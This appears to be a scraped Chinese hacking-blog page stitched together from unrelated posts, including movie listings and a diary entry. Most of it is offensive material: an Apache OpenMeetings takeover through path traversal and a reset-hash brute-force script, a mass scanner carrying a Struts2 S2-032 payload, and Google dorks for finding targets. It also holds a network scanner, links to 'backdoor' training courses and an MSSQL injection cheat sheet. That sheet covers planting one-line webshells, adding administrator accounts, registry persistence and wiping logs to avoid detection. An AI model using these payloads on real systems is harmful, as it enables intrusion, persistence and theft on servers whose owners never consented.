Java就业班全套31G超强完整版教程


xiaohack博客专注前沿科技动态与实用技术干货分享,涵盖 AI 代理、大模型应用、编程工具、文档解析、SEO 实战、自动化部署等内容,提供开源项目教程、科技资讯日报、工具使用指南,助力开发者、AI 爱好者获取前沿技术与实战经验。




众所周知黑帽盒子内部以后门程序出名,此套系列课程是内部培训思路及方法的教程,价值不可估量。
此系列课程看完后绝对颠覆你的价值观和世界观。绝对值得收藏!目前下载链接还有效,大家记得及时下载!
内部项目八-养站技巧.rar
链接: http://pan.baidu.com/s/1hqrrN4C 密码: mq6n
有个人,爱过了就结束了;有句话,说过了就后悔了;有道伤,痛过了就麻木了;有颗心,颤过了就破碎了;一段爱情,过深了就剧终了;一段路口,过难了就错选了;有些东西,放久了就会变质的;有些事物,发展久了也会变质的;有些感情,因时间、距离而贬值;爱那么短,遗忘却那么长。
自从有了个女朋友,就对别的女生没任何兴趣了,以前是跟班里的女同学闹得很多,很热闹,也喜欢跟他们一起玩,但现在不喜欢太多的人,对不太熟悉的人也不想搭理,性格变得有些自闭了,做出一个决定很难,但承担一种结果,是很容易的,因为你无法逃避,每个人都要为自己的决定负责,想着也不小了,却还是觉得自己是个小孩子,每天都要为了明天,未来而打拼,心里有时候想的很多,能写的却很少,就是想着一些事,想着一些无聊的问题,以前都是很爱笑,很阳光的,(至少我自己觉得是这样的,现在好像变得很冷漠,对任何人都爱理不理,总之还是为自己的决定而负责吧),我很早之前就认为后悔没有什么卵用,还不如把时间放在多做点有意义的事上。手机一直关机,而且这破手机我不喜欢打电话,有事说事,很讨厌没完没了的聊天。心里也是压抑的很难受,想要做的很多,但到处束手束脚,很压抑啊(e)。好像把一些东西隐(yin)晦(dang)的表达出来了😁。
邀请码:
| 6b0b2bb07869e0237c5494926b5e743f |
| 948ad54762a50505494fe2b19aca3712 |
| 40aed53e73807ebd315ef2a61403aec4 |
| 75d9705ad3d4e249d35cf29d82024796 |
| 6946b7a6d74efde7798d4a26035b0350 |
| 5ff54648e80aff64df2e5e2fbb41a612 |
| 2722d335e64a9b6689355792d7ac55a7 |
| 2de945811d324939153d07ed89a3d2a2 |
| 6632d54be5a9677a8376207707eac00c |
| 6cd459086327320325f19c32ce5e1fd5 |
| 16293bfb9dbd54bfd2e13ae24da0ec1c |
| 87934dbcee1d850cbf680877359bbd07 |
| efcc8d394737786abbc875e66be6a458 |
| 3911cbc7b1e42f5eb5a2ba0b5d7a47a9 |
| e48779daf4f90948f8d7c8854fd540b8 |
| 439ab3cf9eb41a5bc111e2a89606409c |
| b9b7411f2f099148184c351fd134ec49 |
| 1e55bba3b2cfbc76590e649e6ecd1644 |
| 228c156487f9909fd17e5ceadb431a08 |
| bd6d2f9facaacef05e1135d04b527868 |
| 068bc8afd66252117900295603afed11 |
| eeb875e54095d809219f506281bcc16e |
| ddf26f9260b7c5a0771fbe15b55112d9 |
| 7d6f9ebbc5e676d2067fee1ac22fc61e |
| 51cd26137182b339cd28532187647f9d |
| f1ec066f288507948d11bc5646db51ce |
| 816688c5082f9a322bc913d34baded8f |
| ac1d7e3e93bf63e29f49bf146ce664ae |
| 283adb36f043bc8d354ca17fc1be9fdd |
| 731c1873014724e0c8f8ad6dcd0953b5 |
| 484f51fd358ee4932c59ead3e90d7ae7 |
| fe30a0cb0550c0153214c248479a2327 |
| 339bc4d32b3077d3db5b54c4cd9ac3e5 |
| 053d6f9dbb509537437da0d76eee5513 |
| 312c0e62f7ed18c65068e2eb4fa65974 |
| 48f21f463622bb1827ddc25b4421d25b |
| 08ae56add24da2e4cc9f1e4462379b44 |
| cbbf234f076b7dc884299df0c296e479 |
| e2be6baa2ff06d517f21dc09dffcb558 |
| 3214ac95ce1171b3d618f20824889ab9 |
| ccf591d44e88b6e1c4ea10f43e39b96d |
| 04c234c746045b0e58cae7b96c1ded76 |
| 82f4c57f36efad2d59b6871861f83dd9 |
| 909c67e9f898fa058d3f8a33f673012f |
| 96f9948a701de027183ecc6756f220d7 |
| 24829bcd449f69ba39435047f1632a46 |
| 74f1c4e5a14ee20e0d090ef6bba85205 |
| bb152c1b72bdb3633ce3a5f36f314ed1 |
| 5a5741ef69aa7b6262eb32f3fabcb395 |
| c347f61f049766f11c5819ad832f47d3 |
| 16dd8fb07130ede1b4ca0b3a6bf63d59 |
| 17bbe041d86bd7b4c55489f78516542c |
| 3d84d89b2aa37640a3307c57cb9d9ae1 |
| 48b6e801380936c0488edba3e81fcc41 |
| b972b5b59ffdd2aae22cb93fb73a30ec |
| c585160f85f2ab56600c60c78393ee63 |
| f8d79526c6e2c7890a0aa2c89d3ea367 |
| 55a2c883945faeba59a1a17c219a9635 |
| 8cce3b51a3b516e5a5efad718a5d0857 |
| 85e3c06755da2c8219cd878674d4522a |
| 8086d4114d39fa7859eada48399dd049 |
| f781523d8550a972a4e410d1a4288d12 |
| b1f7e7db865dc7631f24035f2d81bd8f |
| 6cd996c41fcaecc454eaae90537b9363 |
| f277757907040992c6e91ae0f7f1133d |
| 1f8558a055b8e4ed6f416811159462c8 |
| 4933a988c2d08f5543483b284e2269cd |
| 57f555c87df87bc2034ac075a0a0e62f |
| 292d6aa5836427f3b2b3eeaac4c8c23e |
| da3c2daa43d1ddc13631f4cd2ebcf25b |
| b7848aee47989236704bb17fbc5e08ba |
| 2458a38c4642bcaae3bebb3b22a0f984 |
| f153ffb40385609d4c8f504dec7d5708 |
| 6b81e7d74543b97f808c2bc951d7ea10 |
| ca2639c58b5d0c5155ec938a4199a76c |
| 64effb755a61fbac06724c495ffe94e1 |
| ea21cc5fa6b5e6dd2461ec935d34e0a3 |
| 59cbae16009304c73b6d24c88696b4d0 |
| ed554cf9c399c3be5a4f4ff7d8b52966 |
| b60344f622ed8e7ae5f0c073466adfdf |
| 3a077c0bd7fa97b8797141c4b24c9a02 |
| 16551b23bca6b6e0d3670e9ebd97e810 |
| d853774316623c185786c379c5e274f1 |
| fb2287125d8dbd248a5709db55d75e47 |
| 535b4e4f92b773d1433e6b32d595fd0b |
| b7a187af602e2d3e21058d7f8764d6c4 |
| afc619e519796876352e7a128cc1351f |
| fcf1d66c06e4faf8e243a1b1128a167b |
| 3d5764fac924db52185407e5c3f44fe4 |
| df67a1837ba158f5a890845b36484f8d |
| 1bb4184e820a1f2272987e055015d9bb |
| b9496e7ec281dfa4abd8c16ca6fc6f2f |
| 362f34b3c8640ac8818ed5a190478972 |
| cca205bb1f178d82ee4d332c01e0a55e |
| c075e5f475c2df80f4323e042ad0c1ba |
| 6d4e37891e7b96387592510590e794c8 |
| 59b3af7bf2fd77dc7a77af1bff290f34 |
| c9c27182cda12e6b83e94aa27124c679 |
| 9e0873149ecfc6ed7ea4c77c48149c67 |
| d090d6662f35bd2cb10ef1d062ec622e |
XSS平台地址:http://xss.sssie.com/
SSS论坛地址:http://www.sssie.com
上个月被D以后因为没时间一直就没管,只把数据弄好后就没做任何的优化和防护什么的,今天才有点点时间简单搞了下,以后有时间再努力做的更好,分享更多。有换友联的也直接可以给我留言。别说在不在,ok
Apache OpenMeetings 算是比较冷门的系统,国内比较少见,要么都在内网吧。
根据已经发布的漏洞:
Apache OpenMeetings ZIP文件路径遍历(穿越)漏洞(CVE-2016-0784)
Apache OpenMeeting可预测密码重置令牌漏洞(CVE-2016-0783)
存在理论上getshell的可行性;
1. 本地搭建openmeetings环境;
2. 验证ZIP文件路径穿越漏洞;
准备穿越用的zip;
将jsp脚本改名为aaaaaaaaaaaaaaaaas2.jsp
然后zip,

用UE打开,查找aaa(ASCII)

替换aaa为../

我们这里替换为 ../../../../ 跳4次
文件头和尾都有;
保存zip
上传:
管理员登录,找到backup/import

导入zip

会报一个错,不用理会的;

查看文件:

看来4跳走远了,3跳就够了;
其实jsp脚本放在openmeetings的根目录是不能运行的;但是我们放在css这样的目录就可以了;

效果如下:
:5080/openmeetings/css/aaaas2.jsp

如何获得shell就这样了;
Apache OpenMeeting可预测密码重置令牌漏洞
根据描述,查看源码,大概了解是这样的
private void sendHashByUser(User us, String appLink, UserDao userDao) throws Exception {
String loginData = us.getLogin() + new Date();
log.debug("User: " + us.getLogin());
us.setResethash(ManageCryptStyle.getInstanceOfCrypt().createPassPhrase(loginData));
userDao.update(us, -1L);
String reset_link = appLink + "?hash=" + us.getResethash();
String email = us.getAdresses().getEmail();
String template = ResetPasswordTemplate.getEmail(reset_link);
getBean(MailHandler.class).send(email, Application.getString(517), template);
}
hash=md5(user+java:Date())
Java的Date()格式输出是这样的
Thu Apr 28 10:52:24 CST 2016
操作如下:
这里有一个坑,忘记密码,我们看到的样子是这样的;

结果我个人的本地环境,居然是这样的;

当时也没有点,死活没有找到忘记密码在哪里点,结果点开之后更坑

原因是我在安装的时候选择了“中文”,这特么也太远了,那个是用户啊!
重置操作:

中文的

猜解hash
#coding=utf-8
import time,sys
import requests,hashlib
def md5(str):
m = hashlib.md5()
m.update(str)
return m.hexdigest()
if __name__=='__main__':
reset_time_format=time.strftime("%a %b %d %H:%M:%S",time.localtime())
print 'Date_Time_Format: '+reset_time_format+' CST 2016'
current_xtime=time.strftime("%a %b %d %H:",time.localtime())
opm_link=sys.argv[1]
opm_port=sys.argv[2]
opm_user=sys.argv[3]
opm_mins=sys.argv[4]
for i in range(0,60):
secs = ("%02d"%i)
date=current_xtime+str(opm_mins)+':'+str(secs)+' CST 2016'
#print date
hastr=opm_user+str(date)
rest_hash=md5(hastr)
url='http://'+opm_link+':'+opm_port+'/openmeetings/reset?hash='+rest_hash
reset_action=requests.get(url)
req_content=reset_action.text
if 'Password set' in req_content:
print 'User: '+opm_user+'\n'
print 'Password reset url is:\n'+url
估计不了前后几分钟,单独将分钟独立出来,效果:

重置操作

新密码登录,然后zip上传,穿越,得shell。
附注:
date()是带时区的,Thu Apr 28 10:52:24 CST 2016 什么CET CST等;
因此针对国外的用户,这个时间是不一样的,因此问题在利用上需要猜的数量多了很多;
后来上了google,inurl:5080/openmeetings
居然发现了这个:
All Your Meetings Are Belong to Us: Remote Code Execution in Apache OpenMeetings
http://haxx.ml/post/141655340521/all-your-meetings-are-belong-to-us-remote-code
早知道就不搞环境,直接翻译一下算了。
文章中也提到了openmeetings根目录是不能运行jspshell的,但是他采用了另外的方式
修改配置,利用第三方插件来执行程序反弹

最后那句话,本人不仅菜,而且脸皮还厚,请不吝指正。
链接:http://pan.baidu.com/s/1qXZ0ryW 密码:t0vb
https://github.com/rootphantomer/exp
网络资产信息扫描
在渗透测试(特别是内网)中经常需要对目标进行网络资产收集,即对方服务器都有哪些IP,IP上开了哪些端口,端口上运行着哪些服务,此脚本即为实现此过程,相比其他探测脚本有以下优点:1、轻巧简洁,只需python环境,无需安装额外外库。2、扫描完成后生成独立页面报告。
此脚本的大概流程为 ICMP存活探测-->端口开放探测-->端口指纹服务识别-->提取快照(若为WEB)-->生成结果报表
运行环境:python 2.6 +
参数说明
-h 必须输入的参数,支持ip(192.168.1.1),ip段(192.168.1),ip范围指定(192.168.1.1-192.168.1.254),ip列表文件(ip.ini),最多限制一次可扫描65535个IP。
-p 指定要扫描端口列表,多个端口使用,隔开 例如:22,23,80,3306。未指定即使用内置默认端口进行扫描(21,22,23,25,53,80,110,139,143,389,443,445,465,873,993,995,1080,1723,1433,1521,3306,3389,3690,5432,5800,5900,6379,7001,8000,8001,8080,8081,8888,9200,9300,9080,9999,11211,27017)
-m 指定线程数量 默认100线程
-t 指定HTTP请求超时时间,默认为10秒,端口扫描超时为值的1/2。
-n 不进行存活探测(ICMP)直接进行扫描。
结果报告保存在当前目录(扫描IP-时间戳.html)。
例子:
python NAScan.py -h 10.111.1
python NAScan.py -h 192.168.1.1-192.168.2.111
python NAScan.py -h 10.111.1.22 -p 80,7001,8080 -m 200 -t 6
python NAScan.py -h ip.ini -p port.ini -n
服务识别在server_info.ini文件中配置
格式为:服务名|默认端口|正则 例 ftp|21|^220.*?ftp|^220-
正则为空时则使用端口进行匹配,否则以正则匹配结果为准。
下载地址 http://down.future-sec.com/F-NAScan.zip
项目地址 https://github.com/ywolf/F-NAScan
欢迎大家反馈建议和BUG
不管效果怎么样,看到的,收集的都发出来了,自己去测试。
效果图
PHP代码
< ?php /* Strutr 批量扫描工具 By:T0n9 */ error_reporting(0); if(empty($argv[1])){ print_r(" +==================================+ | S2-032命令执行批量扫描工具 | | http://www.moxia.org/ | | 墨侠团队 | | By:T0n9 | +==================================+ [+]程序还存在一些Bug 比如一些奇葩网站的回显误报相对较低 [+]扫完同目录生成文件名_ok.txt文本存放存在漏洞的网站 ->php $argv[0] url.txt<br ?>");exit;
}
$txt = explode("\n",file_get_contents($argv[1])); //要扫描的脚本
echo "[+]$argv[1] 共 ".count($txt)." 条\r\n";
//获取盘符路径POC
$poc = "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8";
for($i = 0;$i<count($txt);$i++){
if(!empty($txt[$i])){
$u = trim($txt[$i]).$poc;
$data_str = c($u);
if(stripos($data_str,"
检测工具
下载地址:
链接: http://pan.baidu.com/s/1jIlNJsM 密码: 9gbf
解压密码:www.t0n9.com (备注有)
第一,集成S232漏洞
第二, 自动识别016 019 032三种漏洞
第三,写文件支持任意目录,批量还没有实现
因为批量还没写好,本来不发布的,现在想想发出来玩玩。
源码:http://pan.baidu.com/s/1bp0Vnen
编译好的:http://pan.baidu.com/s/1nv4E9Nb
接下来的这个就是大家都喜欢的批量了。
下载地址:http://gongju.aizhan.com/
关键字:
inurl:VloginUser.action
inurl:Mail.action
inurl:code.action
inurl:reg.action
inurl:Address.action
inurl:!Index.action
inurl:login.action
inurl:Add.action
inurl:pageslist.action
inurl:action.Action
inurl:Message.action
inurl:Ldap.action
inurl:getMul.action
inurl:shouye.action
inurl:logout.action
inurl:Valid.action
inurl:search.action
inurl:Magazine.action
inurl:news.action
inurl:init.action
inurl:Page.action
inurl:create.action
inurl:index2.action
inurl:default.action
inurl:welcome.action
inurl:Name.action
inurl:single.action
inurl:updateForm.action
inurl:SysStart.action
inurl:adminlogin.action
inurl:Offportal.action
inurl:Buying.action
inurl:Success.action
inurl:exchange.action
inurl:menu.action
inurl:Load.action
inurl:airport.action
inurl:Email.action
inurl:On.action
inurl:show.action
inurl:tain.action
inurl:Login!input.action
inurl:randomPicture.action
骚年们,开始撸起吧。
刚回来看见主页被刷屏...估计是晚了,赶紧写了个脚本加入我的并发框架中.
用法看图
工具
https://github.com/Xyntax/POC-T
简陋的POC
https://github.com/Xyntax/POC-T/blob/master/module/S2032.py
so 现在看大牛们怎么采集url了
http://www.tangscan.com/labs/3
最最最最后一个:K8大牛写的工具,灰常好用,还有K8飞刀,完美结合,自己百度K8的博客,百度都有的,在这儿不多赘述,免得浪费我搬砖的时间。
1、官方首页:http://aws.amazon.com
2、免费VPS:http://aws.amazon.com/free
3、VPS管理:https://console.aws.amazon.com/ec2/home
进入Amazon AWS,注册一个Amazon账号。
Amazon AWS申请要求验证信用卡,扣掉1美元验证费,如果你有双币种信用卡自然没有问题。
5、没有信用卡的朋友也没有关系,你可以申请财付通境外支付,经过测试用财付通的美国运通卡照样没有问题。
进入Amazon AWS亚马逊免费VPS申请地址,登录你的Amazon AWS账号,然后填写你的财付通的美国运通卡。当然你也可以填写你的双币种信用卡。
使用财付通的美国运通卡来通过Amazon AWS的信用卡认证,会被冻结2美元,共冻结两次。第一次是添加信用卡时Amazon AWS验证导致了财付通美元运通卡冻结1美元。
第二次是Amazon AWS为了认证信用卡,会在信用卡那里扣掉1美元作为验证费,等到你的服务到期后,这一美元还是会还给你的。至于被冻结的额外一美元,按照财付通美国运通卡结算,30天后会自动返回到财付通账户中。提交后接下来是电话验证,填写你的手机号码。点击下一步,页面上会出现4个数字。这时候你的手机会收到Amazon AWS的电话,等英语说完了,输入你在页面上看到的4个数字,这时Amazon AWS就会提示验证成功了。Amazon AWS亚马逊云服务免费VPS开通大概要几分钟,不过部分大概等了1个小时左右才可以正常使用。Amazon AWS的免费VPS使用时长是一年,主机配置自然是非常不错的,大家在选择Amazon AWS VPS时注意有些服务会产生收费,请仔细看清说明,否则一不小心则可能对你的信用卡或者美国运通卡收费了。
网络资产信息扫描
在渗透测试(特别是内网)中经常需要对目标进行网络资产收集,即对方服务器都有哪些IP,IP上开了哪些端口,端口上运行着哪些服务,此脚本即为实现此过程,相比其他探测脚本有以下优点:1、轻巧简洁,只需python环境,无需安装额外外库。2、扫描完成后生成独立页面报告。
此脚本的大概流程为 ICMP存活探测-->端口开放探测-->端口指纹服务识别-->提取快照(若为WEB)-->生成结果报表
运行环境:python 2.6 +
参数说明
-h 必须输入的参数,支持ip(192.168.1.1),ip段(192.168.1),ip范围指定(192.168.1.1-192.168.1.254),ip列表文件(ip.ini),最多限制一次可扫描65535个IP。
-p 指定要扫描端口列表,多个端口使用,隔开 例如:22,23,80,3306。未指定即使用内置默认端口进行扫描(21,22,23,25,53,80,110,139,143,389,443,445,465,873,993,995,1080,1723,1433,1521,3306,3389,3690,5432,5800,5900,6379,7001,8000,8001,8080,8081,8888,9200,9300,9080,9999,11211,27017)
-m 指定线程数量 默认100线程
-t 指定HTTP请求超时时间,默认为10秒,端口扫描超时为值的1/2。
-n 不进行存活探测(ICMP)直接进行扫描。
结果报告保存在当前目录(扫描IP-时间戳.html)。
例子:
python NAScan.py -h 10.111.1
python NAScan.py -h 192.168.1.1-192.168.2.111
python NAScan.py -h 10.111.1.22 -p 80,7001,8080 -m 200 -t 6
python NAScan.py -h ip.ini -p port.ini -n
服务识别在server_info.ini文件中配置
格式为:服务名|默认端口|正则 例 ftp|21|^220.*?ftp|^220-
正则为空时则使用端口进行匹配,否则以正则匹配结果为准。
效果图


项目地址 https://github.com/ywolf/F-NAScan

导演: 袁和平
编剧: 约翰·福斯克 / 王度庐
主演: 甄子丹 / 杨紫琼 / 岑勇康 / 刘承羽 / 李截 / 更多...
类型: 剧情 / 动作 / 武侠 / 古装
制片国家/地区: 中国大陆 / 美国
语言: 国语/英语
上映日期: 2016-02-19(中国大陆) / 2016-02-26(美国)
片长: 103分钟
又名: 卧虎藏龙2:青冥宝剑 / 卧虎藏龙Ⅱ青冥宝剑 / 铁骑银瓶
IMDb链接: tt2652118
卧虎藏龙:青冥宝剑的剧情简介 · · · · · ·
武当弃徒戴阎王(李截 Jason Scott Lee 饰)为抢夺青冥古剑夜袭铁小贝勒府,俞秀莲(杨紫琼 饰)重出江湖,携手旧友孟思昭(甄子丹 饰)保护宝剑,被蒙蔽的魏方(岑勇康 Harry Shum Jr. 饰)助纣为虐,雪瓶(刘承羽 Natasha Liu Bordizzo 饰)告知魏方其身世之谜。一场江湖混战,众人力擒戴阎王,保护宝剑周全。
影片改编自王度庐小说《铁骑银瓶》。





解压密码:blog.xiaohack.org
第1种:
regedit /e c:\\tsport.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
然后type c:\\tsport.reg | find "PortNumber"
然后16进制转10进制查明文;这个网站可以转换http://jinzhi.supfree.net
c:\\tsport.reg可能会出现无法创建目录文件 自己找个可写目录吧
第2种方法:执行tasklist /svc
我们只要svchost.exe对应的PID号(svchost.exe TermService对应的PID号,请把PID记录下来),然后执行netstat /ano查到pid对应的Local Address端口就是3389修改后的端口了
第3种 shell权限大点的话在注册表里直接查看 shell里的提权探测那里有些也能看到 有时43958可能提权了 可是权限低没法执行cmd wscript删了就传aspx马 再不行默认3389试试能远程连接不 扫1-9999查端口估计测试到手软 因为开放端口实在太多了 一个一个测试?

译 名 Kung Fu Panda 3
片 名 功夫熊猫3/熊猫阿宝3/阿宝正传3
年 代 2016
国 家 中国大陆 / 美国
类 别 喜剧 / 动作 / 动画 / 冒险
上映日期 2016年1月29日 中国
语 言 英语
字 幕 简体中英 / 简体
链 接 http://www.imdb.com/title/tt2267968/
评 分 7.8/10 from 754 users
豆瓣评分 8.0/10 from 84,5856 users
豆瓣链接 http://movie.douban.com/subject/11589036/
文件格式 x264 + AAC
视频尺寸 1280 x 720
文件大小 1.98 GB
片 长 95分钟
导 演 亚历山德罗·卡罗尼 Alessandro Carloni
吕寅荣 Jennifer Yuh
主 演 杰克·布莱克 Jack Black ... Po
布莱恩·科兰斯顿 Bryan Cranston
达斯汀·霍夫曼 Dustin Hoffman
安吉丽娜·朱莉 Angelina Jolie
J·K·西蒙斯 J.K. Simmons
塞斯·罗根Jackie Chan
塞斯·罗根 Seth Rogen
刘玉玲 Lucy Liu
David Cross
凯特·哈德森 Kate Hudson
吴汉章 James Hong
兰德尔·杜克·金 Randall Duk Kim
影视简介:
在新一集故事里,阿宝(杰克·布莱克 Jack Black 配音)失散已久的亲生父亲突然现身,重逢的父子二人一起来到了一片不为人知的熊猫乐土。在这里,阿宝遇到了好多滑稽的熊猫同类。当拥有神秘力量的大反派天煞(J·K·西蒙斯 J.K. Simmons 配音)横扫神州大地,妄图残害所有功夫高手时,阿宝必须迎难而上,学着把那些热爱享乐、笨手笨脚的熊猫村民训练成一班所向披靡的功夫熊猫!
影视截图:





2016.功夫熊猫3.HD超清中字.720P.torrent
百度网盘(速度保存) http://pan.baidu.com/s/1biotMe 提取密码 uqme
MSSQL2005手工注入列目录写马
啊d能注入的话就不用往下看了
sqlmap能注入出密码
判断是否支持多行语句以下用法要求支持多行语句才能使用:
;declare @x int--
比如a.asp?id=1;declare @x int--
key.asp?kwyname=qq%';declare @x int-- and '%'='
返回页面和不加语句时的一样正常说明支持,当然一开始要求是注入点
参数后面加语句,有些过滤了--自己去突破要么不加,过滤了单引号我有办法绕过
建表p(i为自动编号,a记录盘符类似"c:\",b记录可用字节,其它省略)
URL;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar(255),d nvarchar(255));--
URL;insert p exec xp_availablemedia;--列出所有驱动器并插入表p
URL;and (select count(*) from p)>3;--折半法查出驱动器总数
URL;and ascii(substring((select a from p where i=1),1,1))=67;--折半法查出驱动器名(注asc(c)=67)
--上面一般用于无显错情况下使用-------以此类推,得到所有驱动器名
URL;and (select a from p where i=1)>3;--报错得到第一个驱动器名
--上面一般用于显错情况下使用-------以此类推,得到所有驱动器名
URL;;drop table p;--删除表p
--(2) ******查看目录方法******
URL;create table pa(m nvarchar(255),i nvarchar(255));--建表pa(m记录目录,i记录深度)
URL;insert pa exec xp_dirtree ’e:’;--列出驱动器e并插入表pa
URL;and (select count(*) from pa where i>0)>-1;--折半法查出i深度
URL;and (select top 1 m from pa where i=1 and m not in(select top 0 m from pa))>0;--报错得到深度i=1的第一个目录名
--上面一般用显错且目录名不为数字情况下使用-------(得到第二个目录把"top 0"换为"top 1",换深度只换i就行)以此类推,得到e盘的所有目录
URL;and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))>0;--折半法查出深度i=1的第一个目录名的长度
URL;and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))>0;--折半法查出深度i=1的第一个目录名的第一个字符长度
--上面一般用无显错情况下使用-------(得到第二个目录把"top 0"换为"top 1",换深度只换i就行)以此类推,得到e盘的所有目录
URL;drop table pa;--删除表pa
----------------------------经过上面的方法就可得到服务器所有目录(这里为连接用户有读取权限目录)-----------------
--(3) 数据库备份到Web目录(先拿个WebShell再说吧 注:此为SQL Server2000)
URL;alter database employ_ set RECOVERY FULL;--把当前库L设置成日志完全恢复模式
URL;URL;create table s(l image);--建表s
URL;backup log s to disk = ’c:cmd’ with init;--减少备分数据的大小
URL;URL;insert s values(’<%execute(request("a"))%>’)--在表s中插入一句话马
URL;backup log hh to disk = ’e:\web\g.asp’;--备分日志到WEB路径
URL;drop table s;--删除表s
URL;alter database hh set RECOVERY SIMPLE;--把SQL设置成日志简单恢复模式
--------------------------------------OK到此WebShell应该到手了-----------------------------------------------
--(4) 以下为一些注入杂项
----SA权限:
URL;exec aster.dbo.sp_addlogin hacker;--添加SQL用户
URL;exec master.dbo.sp_password null,hacker,hacker;--设置SQL帐号hacker 的密码为 hacker
RL;exec master.dbo.sp_addsrvrolemember sysadmin hacker;--加hacker进sysadmin管理组
URL;exec master.dbo.xp_cmdshell ’net user hacker hacker /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add’;--建立一个系统用hacker 并设置其密码为hacker
URL;exec master.dbo.xp_cmdshell ’net localgroup administrators hacker /add’;--hacker加入到管理员组
----SQL Server2005暴库、表、段法(前提有显错、无显错用折半法)
URL and 0<(select count(*) from master.dbo.sysdatabases);--折半法得到数据库个数
URL and 0<(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1);--
--依次提交 dbid = 2.3.4... 得到更多的数据库名
URL and 0<(select count(*) name from employ.dbo.sysobjects where xtype=’U’);--折半法得到表个数(假设暴出库名employ)
URL and 0<(select top 1 name from employ.dbo.sysobjects where xtype=’U’)
-- 假设暴出表名为"employ_qj"则在上面语句上加条件 and name not in (’employ_qj’ 以此一直加条件....
URL and 0<(select top 1 name from syscolumns where id in (select id from sysobjects where type = ’u’ and name = ’employ_qj’));--
--假设暴出字段名为"id"则在上面语句上加上条件 and name not is(’id’) 以此一直加条件....
---------------------按上面方法库、表、段的名称都可以得到----用以上方法可以得到段段里的数据--------------------
select * from master.dbo.sysdatabases --查询数据库
select * from NetBook.dbo.sysobjects where xtype=’u’ --查询数据库NetBook里的表
select * from NetBook.dbo.syscolumns where id=object_id(’book’) --查询book表里的字段
---------------------------------------------------------------------------------------------------------------
---------------------------------------SQL扩展沙盘提权-----------------------------------
看来xp_cmdshell是不能用鸟~ 不过偶们还有SP_OAcreate可以用 用SP_OAcreate一样可以执行系统命令
在查询分析器里执行
DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD
@shell,’run’,null, ’C:\WINdows\system32\cmd.exe /c net user gydyhook hook /add’
这段代码就是利用SP_OAcreate来添加一个gydyhook的系统用户 然后直接提升为管理员权限就OK了
提示命令完成成功
直接写
个一句话进去
语句如下
exec master.dbo.xp_subdirs ’d:\web\www.xx.com’;
exec sp_makewebtask ’d:\web\www.XXXX.com\XX.asp’,’select’’<%execute(request("SB"))%>’’ ’
提示命令执行成功偶们看看效果
查询分析器里执行select * from openrowset(’microsoft.jet.oledb.4.0’,’
;database=c:\windows\system32\ias\ias.mdb’,
’select shell("cmd.exe /c net user admin admin1234 /add")’)来利用沙盘来添加个管理员 但是事实告诉
我 我的RP并不好
嘿嘿 使用declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate ’scripting.filesystemobject’, @o out
exec sp_oamethod @o, ’opentextfile’, @f out, ’d:\Serv-U6.3\ServUDaemon.ini’, 1
exec @ret = sp_oamethod @f, ’readline’, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, ’readline’, @line out
end
这段代码就可以把ServUDaemon.ini里的配置信息全部显示出来 嘿嘿 既然能看了那偶门不是一样可以写进去?
直接写一个系统权限的FTP帐号 进去
使用declare @o int, @f int, @t int, @ret int
exec sp_oacreate ’scripting.filesystemobject’, @o out
exec sp_oamethod @o, ’createtextfile’, @f out, ’d:\Serv-U6.3\ServUDaemon.ini’, 1
exec @ret = sp_oamethod @f, ’writeline’, NULL, 《这里添写自己写好的SU配置信息 刚才复制的那些都要
写上去》
然后执行一下 成功执行 我们再用存储过程看看写进去没有
OK 我XXXXXX 成功写进去了一个用户名为XXXX密码为空的系统权限的FTP 然后偶们在FTP里执行
quote siteXXXXXXX 提权就好了。 这里已经很熟悉了 就不写了。~ 然后用3389连一下 成功地到服务器权限
然后偶们再用set nocount on
declare @logicalfilename sysname,
@maxminutes int,
@newsize int 来清理掉SQL日志 免的被管理员发现
------
DECLARE @cmd INT EXEC sp_oacreate 'wscript.shell',@cmd output
EXEC sp_oamethod @cmd,'run',null,'cmd.exe /c net user renwoxin$Content$nbsp;test /add&a
------------------------------MSSQL db_owner注入利用xp_regwrite获得系统权限---------------------------------------
xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\currentversion\run’,’xwq1’,’REG_SZ’,’net user h86$ hacker /add’
呵呵,返回一个正常页面,说明成功完成拉,再在注射点输入
xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\currentversion\run’,’xwq2’,’REG_SZ’,’net localgroup administrators h86$ /add’
---------------------------------------------------------------------------------------------
简单的如where xtype=’U’,字符U对应的ASCII码是85,所以可以用where xtype=char(85)代替;
如果字符是中文的,比如where name=’用户’,可以用where name=nchar(29992)+nchar(25143)代替。
-------------------------------------------备份一句话木马----------------------------------------
日志备分WEBSHELL标准的七步:
1.InjectionURL’;alter database XXX set RECOVERY FULL-- (把SQL设置成日志完全恢复模式)
2.InjectionURL’;create table cmd (a image)-- (新建立一个cmd表)
3.InjectionURL’;backup log XXX to disk = ’c:cmd’ with init-- (减少备分数据的大小)
4.InjectionURL’;insert into cmd (a) values (’<%%25eval(request("a")):response.end%%25>’)-- (插入一句话木马)
5.InjectionURL’;backup log XXX to disk = ’d:chinakmtest.asp’-- (备分日志到WEB路径)
6.InjectionURL’;drop table cmd-- (删除新建的cmd表)
7.InjectionURL’;alter database XXX set RECOVERY SIMPLE--(把SQL设置成日志简单恢复模式)
注:InjectionURL是注入点,XXX是数据库名称.
数据库差异备份代码:
BACKUP/**/LOG/**/peihua/**/WITH/**/NO_LOG/**/DBCC/**/SHRINKDATABASE(peihua)--
dump/**/transaction/**/peihua/**/with/**/no_log--
